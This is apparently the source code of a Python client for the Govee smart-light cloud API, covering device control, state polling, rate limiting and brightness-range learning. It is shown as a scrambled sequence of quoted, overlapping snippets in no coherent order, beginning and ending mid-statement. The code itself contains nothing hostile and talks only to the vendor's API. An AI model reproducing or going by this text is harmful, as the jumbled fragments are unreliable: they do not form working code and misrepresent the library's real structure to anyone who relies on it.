prop_online =", "must be within 0 .. 254\" else: command = \"color\" command_color = {\"r\":", "# set brightness as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command =", "= learning_storage if not self._learning_storage: # use an internal learning storage as long", "self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off", "Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device, return success and error", "def _set_online(self, online: bool): \"\"\"Set the online state and fire an event on", "_get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds -", "%s uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max", "prop_power_state = False elif device.config_offline_is_off: # learning option prop_power_state = False # autobrightness", "raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp", "doesn't change power state. True: an offline device is shown as off. \"\"\"", "device: err = f\"Invalid device {device_str}, {device}\" else: if len(color) != 3: err", "seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model, \"cmd\":", "await response.json() prop_online = False prop_power_state = False prop_brightness = False prop_color =", "# The time at which the current rate limit window resets in UTC", "self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be reset.\"\"\" return", "await response.text() err = f\"API-Error {response.status} on command {cmd}: {text} for device {device}\"", "str controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool", "200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() +", "to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests remaining", "one element if \"online\" in prop: prop_online = prop[\"online\"] is True elif \"powerState\"", "header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of requests you're permitted", "<= self.rate_limit_on: # do we need to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec", "{\"r\": red, \"g\": green, \"b\": blue} result, err = await self._control(device, command, command_color)", "defaults by some conditions if not is_retrievable: learned_get_brightness_max = -1 if model_str ==", "# autobrightness learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100 and", "False err = None device_str, device = self._get_device(device) if not device: err =", "= ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"]", "_RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset =", "== \"H6104\": before_set_brightness_turn_on = True # load learned/configured values if device_str in learning_infos:", "current rate limit window resets in UTC epoch seconds. # return state from", "self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. Defaults", "value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def", "command: str, params: Any ) -> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\"", "\"\"\"Use close when your are finished with the Client without using an async", "must be below {self._limit}\" ) if val < 1: raise GoveeError(f\"Rate limiter threshold", "from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\"", "rate limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate limiter threshold {val} must", "import datetime from events import Events from typing import Any, List, Optional, Tuple,", "if self._session: await self._session.close() self._session = None def __init__( self, api_key: str, *,", "this Client without an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__()", "state and fire an event on change.\"\"\" if self._online != online: self._online =", "\"message\" in result and result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str, GoveeDevice])", "rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which the current", "@dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str model: str device_name:", "learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned, and learn if ( learning_infos[device.device].set_brightness_max", "to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active,", "if err: class error_response: def __init__(self, err_msg): self._err_msg = err_msg status = -1", "254\" elif blue < 0 or blue > 255: err = f\"set_color: invalid", "def _get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for", "= f\"set_color: invalid value {color}, green must be within 0 .. 254\" elif", "GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by address or GoveeDevice DTO. returns:", "except Exception as ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if limit_unknown:", "0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" )", "is not None: # global option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off:", "all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err = await", "prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property", "if self._online != online: self._online = online # inform about state change self.events.online(self._online)", "in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0, color=(0,", "if other devices also utilize the govee API\" ) limit_unknown = True if", "self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result >", "device {device_str}, {device}\" else: command = \"turn\" params = onOff result, err =", "async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper", "# return state from hisory for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS", "f\"Invalid device {device_str}\" elif not device.retrievable: # device {device_str} isn't able to return", "-> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for dev in self._devices: lst.append(self._devices[dev])", "support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0,", "err = None if not device: err = f\"Invalid device {device_str}, {device}\" else:", "def __init__(self, err_msg): self._err_msg = err_msg status = -1 async def text(self): return", "command, command_color) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow", "else: if brightness_set > 100: device.learned_set_brightness_max = 254 await self._learn(device) if not err:", "# this will set self.online await self.ping() except: pass return self.online async def", "global option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning option prop_power_state", "Unsupported Cmd Value # set brightness as 0..100 as 0..254 didn't work brightness_set", "range 0 .. 254\" else: if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device)", "str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY and storage", "err = f\"Invalid device {device_str}, {device}\" else: command = \"turn\" params = onOff", "address or GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str = device if isinstance(device,", "Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd =", "\"\"\"Track rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check if", "254 / 100) if device.learned_set_brightness_max == 100: # set brightness as 0..100 brightness_set", "== result: ping_ok_delay = max(1, delay) else: err = f\"API-Result wrong: {result}\" else:", "-> bool: \"\"\"Given an aiohttp result checks if it is a success result.\"\"\"", "return self.devices async def _get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]:", "async with self._api_get(url=_API_DEVICES) as response: if response.status == 200: result = await response.json()", "self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC", "in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness =", "== \"on\" elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop:", "self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result =", "learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off = False # effenctive state #", "GoveeDevice]: \"\"\"Get a device by address or GoveeDevice DTO. returns: device_address, device_dto \"\"\"", "elif device.config_offline_is_off: # learning option prop_power_state = False # autobrightness learning if device.learned_get_brightness_max", "# try again with 0-100 range if \"API-Error 400\" in err: # Unsupported", "def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for", "active.\"\"\" # do we have requests left? if self.rate_limit_remaining <= self.rate_limit_on: # do", "GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False # init Dict and entry", "sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for", "Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\"", "onOff == \"on\" return success, err async def set_brightness( self, device: Union[str, GoveeDevice],", "try again with 0-100 range if \"API-Error 400\" in err: # Unsupported Cmd", "\"history\" self._devices[device_str].power_state = onOff == \"on\" return success, err async def set_brightness( self,", "Any ) -> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device =", "dev in self._devices: lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice: \"\"\"Single device", "and error message.\"\"\" return await self._turn(device, \"off\") async def _turn( self, device: Union[str,", "lerned, and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s", "you want to use this Client without an async context manager.\"\"\" self =", "_API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL", "bool # this is the learning config, possibly overridden by a global config", "_API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\"", "brightness_result > 0 return success, err async def _learn(self, device): \"\"\"Persist learned information", "response: result = await response.text() delay = int((time.time() - start) * 1000) if", "if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\"", "< 0 or blue > 255: err = f\"set_color: invalid value {color}, blue", "sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted", "response.text() delay = int((time.time() - start) * 1000) if response.status == 200: if", "method to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track", "controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO", "get_devices result self._devices = devices return self.devices, err def _get_device(self, device: Union[str, GoveeDevice])", "(r, g, b) where each value may be in range 0-255 \"\"\" success", "{device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err async def get_states(self) ->", "{device_str} not possible: {err}\") return result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request", "self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst =", "manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async def __aexit__(self, *err): \"\"\"Async context", "on change.\"\"\" if self._online != online: self._online = online # inform about state", ") -> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device = self._get_device(device)", "self._devices[device_str].power_state = onOff == \"on\" return success, err async def set_brightness( self, device:", "{device_str} not possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked:", "govee API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING", "result.source = \"api\" result.error = None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting", "API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in", "down from this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return", "% repr(ex) except Exception as ex: err = \"unknown error: %s\" % repr(ex)", "prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts", "and _RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset", "{err}\") return result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all", "List[GoveeDevice]: \"\"\"Request states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices:", "device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for getting brightness state.\",", "if isinstance(device, GoveeDevice): device_str = device.device if not device_str in self._devices: device =", "device_str, device = self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\")", "{seconds_locked} seconds\" ) else: params = {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE,", "conditions if not is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on =", "-> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success = False err = None", "return {} @asynccontextmanager async def _api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP", "result checks if it is a success result.\"\"\" return \"message\" in result and", "max(1, math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100)", "= 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str model:", "if device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max", "Union import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo,", "async with request_lambda() as response: self._set_online(True) # we got something, so we are", "str device_name: str controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool", "_LOGGER.debug(\"get_devices\") devices = {} err = None async with self._api_get(url=_API_DEVICES) as response: if", "response: if response.status == 200: result = await response.json() timestamp = self._utcnow() learning_infos", "in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned, and learn if", "somehow these are all dicts with one element if \"online\" in prop: prop_online", "set_brightness( self, device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness", "= (0, 0, 0) prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]: # somehow", "color_temp) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source", "255: err = f\"set_color: invalid value {color}, green must be within 0 ..", "if limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a call when rate", "err = None async with self._api_get(url=_API_DEVICES) as response: if response.status == 200: result", "if seconds_lock < 0: seconds_lock = 0 return seconds_lock async def _control( self,", "state, return 'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked: #", ") result = self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness = prop_brightness", "must be tuple with (r, g, b) values\" else: red = color[0] green", "brightness_set_100 = 0 if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness * 100", "\"error from aiohttp: %s\" % repr(ex) except Exception as ex: err = \"unknown", "str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False # init Dict and", "err: _LOGGER.warning(\"error getting state for device %s: %s\", device_str, err, ) self._devices[device_str].error =", "device: err = f\"Invalid device {device_str}\" elif not device.retrievable: # device {device_str} isn't", "overridden by a global config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class", "No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err =", "url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield response @asynccontextmanager async def _api_request_internal(self,", "= self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: if", "if brightness < 0 or brightness > 254: err = f\"set_brightness: invalid value", "DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text = await response.text() err =", "url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield response @asynccontextmanager async def _api_get(self,", "as response: result = await response.text() delay = int((time.time() - start) * 1000)", "0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if we don't sleep", "for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness", "learned information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached()", "minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests remaining in the current", "0 or green > 255: err = f\"set_color: invalid value {color}, green must", "{device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if", "ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\")", "0 or brightness > 254: err = f\"set_brightness: invalid value {brightness}, allowed range", "2 # do not send another control within n seconds after controlling the", "n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send", "remaining in the current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time", "API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err = None", "command = \"color\" command_color = {\"r\": red, \"g\": green, \"b\": blue} result, err", "= brightness_result self._devices[device_str].power_state = brightness_result > 0 return success, err async def _learn(self,", "range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100:", "success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp =", ") elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\")", "device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another control within n seconds", "== \"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on", "status = -1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err)", "device is offline. None: default, use config_offline_is_off from learning, or False by default.", "support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0, color=(0, 0, 0),", "\"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params )", "\"\"\"API Methond handling all HTTP calls. This also handles: - rate-limiting - online/offline", "again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str, *, learning_storage:", "source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await", "self.events.online(self._online) if not online: # show all devices as offline for device in", "state for device %s: %s\", device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str]", "asyncio import logging import time import math from contextlib import asynccontextmanager from dataclasses", "-> Tuple[bool, str]: \"\"\"Turn off a device, return success and error message.\"\"\" return", "prop[\"brightness\"] elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif", ") else: params = {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as", "if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success,", "err = f\"set_color: invalid value {color}, green must be within 0 .. 254\"", "if self.rate_limit_remaining <= self.rate_limit_on: # do we need to sleep? sleep_sec = self.rate_limit_reset_seconds", "_learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ]", "invalid value {color}, red must be within 0 .. 254\" ) elif green", "item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max = None", "False async def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try: # this", "we are offline self._set_online(False) err = \"error from aiohttp: %s\" % repr(ex) except", "\"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0 return success, err async", "def _api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\" async with", "int ) -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success = False err", "\"learned device %s uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[", "API client package.\"\"\" import asyncio import logging import time import math from contextlib", "= item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max =", "{response.status}: {result}\" # cache last get_devices result self._devices = devices return self.devices, err", "Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def close(self): \"\"\"Use close when your", "as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" result, err", "we are online self._track_rate_limit(response) # return the async content manager response yield response", "return the async content manager response yield response except aiohttp.ClientError as ex: #", ") self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error = None return self.devices", "device: err = f\"Invalid device {device_str}, {device}\" else: if brightness < 0 or", "color[1] blue = color[2] if red < 0 or red > 255: err", "controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command in device.support_cmds: err =", "@property def online(self): \"\"\"Last request was able to connect to the API.\"\"\" return", "-> Tuple[bool, str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\" success = False", "/ 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max == 100:", "active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def", "= aiohttp.ClientSession() return self async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if", "green = color[1] blue = color[2] if red < 0 or red >", "retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool online:", "# inform about state change self.events.online(self._online) if not online: # show all devices", "GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"],", "call when rate limiting is active.\"\"\" # do we have requests left? if", "\"\"\"Use create method if you want to use this Client without an async", "g, b) where each value may be in range 0-255 \"\"\" success =", "self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield response @asynccontextmanager", "): \"\"\"Use create method if you want to use this Client without an", "epoch seconds. # return state from hisory for n seconds after controlling the", "do not send another control within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS", "f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else: command = \"colorTem\" result, err", "def _learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo", "we have requests left? if self.rate_limit_remaining <= self.rate_limit_on: # do we need to", "f\"API-Error {response.status} on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible:", "self, device: Union[str, GoveeDevice], command: str, params: Any ) -> Tuple[Any, str]: \"\"\"Control", "self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device {device_str}\" elif not device.retrievable: #", "None self._learning_storage = learning_storage if not self._learning_storage: # use an internal learning storage", "config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global behavour when", "== None: learning_infos = {} if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo()", "timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str =", "device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max = 254", "self._utcnow() if seconds_lock < 0: seconds_lock = 0 return seconds_lock async def _control(", "headers=self._getHeaders(auth), params=params ) ) as response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda):", "seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status == 429:", "_LOGGER.debug( f\"state object returned from cache: {result}, next state for {device.device} from api", "the Client without using an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth:", "= f\"set_color: invalid value {color}, must be tuple with (r, g, b) values\"", "states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err", "= f\"Invalid device {device_str}\" elif not device.retrievable: # device {device_str} isn't able to", "# create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"],", "if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s", "str]: \"\"\"Set color (r, g, b) where each value may be in range", "yield response except aiohttp.ClientError as ex: # we are offline self._set_online(False) err =", "device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json )", "the actual brightness pull the brightness up to max once.\", device.device, ) changed", "if model_str == \"H6104\": before_set_brightness_turn_on = True # load learned/configured values if device_str", "context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def close(self):", "from events import Events from typing import Any, List, Optional, Tuple, Union import", "\"unknown error: %s\" % repr(ex) if err: class error_response: def __init__(self, err_msg): self._err_msg", "headers=self._getHeaders(auth), json=json ) ) as response: yield response @asynccontextmanager async def _api_get(self, *,", "for multiple processes self._limit = 100 self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off", "doesn't work if we don't sleep await asyncio.sleep(1) # set brightness as 0..254", "255: err = ( f\"set_color: invalid value {color}, red must be within 0", "= state self._devices[device_str].error = None return self.devices async def _get_device_state( self, device: Union[str,", "prop_brightness = math.floor( prop_brightness * 254 / 100 ) result = self._devices[device_str] result.online", "# we will need to re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod", "self._devices: lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\"", "device, return success and error message.\"\"\" return await self._turn(device, \"on\") async def turn_off(self,", "False # init Dict and entry for device if learning_infos == None: learning_infos", "_getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key}", "output what was lerned, and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug(", "if red < 0 or red > 255: err = ( f\"set_color: invalid", "self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return", "async with self._api_get(url=_API_PING, auth=False) as response: result = await response.text() delay = int((time.time()", "is a success result.\"\"\" return \"message\" in result and result[\"message\"] == \"Success\" async", "Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as", "rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger rate limiting.\"\"\" if val >", "brightness_result = brightness_result_100 command = \"brightness\" result, err = await self._control(device, command, brightness_set)", "set brightness as 0..100 as 0..254 didn't work brightness_set = brightness_set_100 brightness_result =", "f\"Invalid device {device_str}, {device}\" else: if len(color) != 3: err = f\"set_color: invalid", "api_key self._devices = {} self._rate_limit_on = 5 # safe available call count for", "\"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result}, next state", "await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted down from this value.\"\"\"", "be above 1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the global config", "as response: if response.status == 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS )", "None def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init", "= None, ): \"\"\"Use create method if you want to use this Client", "except Exception as ex: err = \"unknown error: %s\" % repr(ex) if err:", "-1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self):", "device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a device, return success and", "device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned, and", "device.online = False async def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try:", "= timestamp result.source = \"api\" result.error = None _LOGGER.debug( f\"state returned from API:", "\"brightness range for %s is assumed. If the brightness slider doesn't match the", "window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which the current rate limit", "{color_temp}, allowed range 2000-9000\" else: command = \"colorTem\" result, err = await self._control(device,", "device_address, device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice): device_str = device.device if", "allowed in {seconds_locked} seconds\" ) else: params = {\"device\": device.device, \"model\": device.model} async", "{cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": 